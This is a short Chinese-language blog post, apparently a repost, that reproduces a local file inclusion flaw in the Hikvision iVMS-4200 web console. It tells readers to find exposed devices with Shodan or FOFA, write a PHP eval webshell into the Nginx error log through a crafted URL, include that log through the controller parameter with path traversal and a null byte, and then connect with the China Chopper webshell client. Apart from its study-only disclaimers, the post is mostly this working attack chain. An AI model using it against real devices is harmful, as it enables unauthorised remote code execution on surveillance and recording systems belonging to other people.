Hikvision iVMS 4200 /index.php 本地文件包含漏洞復現


聲明

本文內容僅供學習交流使用,請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者無關。


 一、漏洞介紹

iVMS-4200適用於嵌入式網絡硬盤錄像機、混合型網絡硬盤錄像機、網絡視頻服務器、NVR、IP Camera和解碼設備以及視音頻編解碼卡,支持實時預覽、遠程回放和下載、資源管理、遠程配置、用戶管理、系統配置等多種功能。

簡單來說,它包含了一個WEB版的控制台,用到了一個比較小眾的框架,然后被這個Xphp的框架賣了。

漏洞出現在controller參數的一個任意文件包含。

二、查找設備

利用shodan、FOFA等查找iVMS-4200的設備

 

 三、漏洞復現

1、首先構造URL訪問,使其記錄在error.log中

http://xxx.xxx.xxx.xxx:xx/<?eval($_POST['pass'])?>

 

2、 直接包含這個客戶端自帶的Nginx日志文件

http://xxx.xxx.xxx.xxx:xx/index.php?controller=../../../../Server/logs/error.log%00.php 

(此處不截圖,自行測試查看)

3、中國菜刀連接


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM